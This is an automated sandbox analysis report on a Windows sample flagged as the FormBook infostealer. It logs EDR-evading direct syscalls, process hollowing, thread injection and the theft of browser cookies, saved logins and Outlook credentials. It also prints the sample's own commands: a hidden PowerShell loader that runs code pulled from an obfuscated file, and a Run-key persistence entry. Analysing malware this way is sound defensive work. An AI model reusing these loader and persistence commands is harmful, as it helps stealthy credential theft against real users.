        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031129A0 mov eax, dword ptr fs:[00000030h]12_2_031129A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031009AD mov eax, dword ptr fs:[00000030h]12_2_031009AD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031009AD mov eax, dword ptr fs:[00000030h]12_2_031009AD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310A9D0 mov eax, dword ptr fs:[00000030h]12_2_0310A9D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031349D0 mov eax, dword ptr fs:[00000030h]12_2_031349D0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CA9D3 mov eax, dword ptr fs:[00000030h]12_2_031CA9D3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031969C0 mov eax, dword ptr fs:[00000030h]12_2_031969C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031329F9 mov eax, dword ptr fs:[00000030h]12_2_031329F9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031329F9 mov eax, dword ptr fs:[00000030h]12_2_031329F9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318E9E0 mov eax, dword ptr fs:[00000030h]12_2_0318E9E0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0318C810 mov eax, dword ptr fs:[00000030h]12_2_0318C810
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A483A mov eax, dword ptr fs:[00000030h]12_2_031A483A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A483A mov eax, dword ptr fs:[00000030h]12_2_031A483A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0313A830 mov eax, dword ptr fs:[00000030h]12_2_0313A830
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov eax, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov eax, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov eax, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov ecx, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov eax, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03122835 mov eax, dword ptr fs:[00000030h]12_2_03122835
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03130854 mov eax, dword ptr fs:[00000030h]12_2_03130854
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03104859 mov eax, dword ptr fs:[00000030h]12_2_03104859
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03104859 mov eax, dword ptr fs:[00000030h]12_2_03104859
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03112840 mov ecx, dword ptr fs:[00000030h]12_2_03112840
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03196870 mov eax, dword ptr fs:[00000030h]12_2_03196870
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03196870 mov eax, dword ptr fs:[00000030h]12_2_03196870
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtClose: Direct from: 0x76F02B6C
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: NULL target: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 4348Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\cmd.exeThread APC queued: target process: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeJump to behavior
        Sample uses process hollowing technique
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Untapestried.exe base address: 400000Jump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Untapestried.exe base: 1660000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Untapestried.exe base: 19FFF4Jump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Untapestried.exe "C:\Users\user\AppData\Local\Temp\Untapestried.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"Jump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "lgplante" /t reg_expand_sz /d "%divergente% -windowstyle minimized $millibar=(get-itemproperty -path 'hkcu:\ciconiform\').syskerne;%divergente% ($millibar)"
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "lgplante" /t reg_expand_sz /d "%divergente% -windowstyle minimized $millibar=(get-itemproperty -path 'hkcu:\ciconiform\').syskerne;%divergente% ($millibar)"Jump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_10001112 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GlobalAlloc,GlobalLock,GetVersionExW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenW,lstrlenW,lstrlenW,lstrcpynW,lstrlenW,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatW,GlobalSize,lstrlenW,lstrcpyW,CharNextW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyW,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,0_2_10001112
        Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887371523.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000000.2071184956.0000000001280000.00000002.00000001.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000000.2218897379.0000000001590000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0C

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		11
        Deobfuscate/Decode Files or Information        		1
        OS Credential Dumping        		3
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API        		1
        Registry Run Keys / Startup Folder        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		LSASS Memory15
        System Information Discovery        		Remote Desktop Protocol1
        Data from Local System        		1
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Shared Modules        		Logon Script (Windows)512
        Process Injection        		3
        Obfuscated Files or Information        		Security Account Manager221
        Security Software Discovery        		SMB/Windows Admin Shares1
        Email Collection        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts11
        Command and Scripting Interpreter        		Login Hook1
        Registry Run Keys / Startup Folder        		1
        Software Packing        		NTDS2
        Process Discovery        		Distributed Component Object Model1
        Clipboard Data        		4
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud Accounts2
        PowerShell        		Network Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets131
        Virtualization/Sandbox Evasion        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading        		Cached Domain Credentials1
        Application Window Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Modify Registry        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
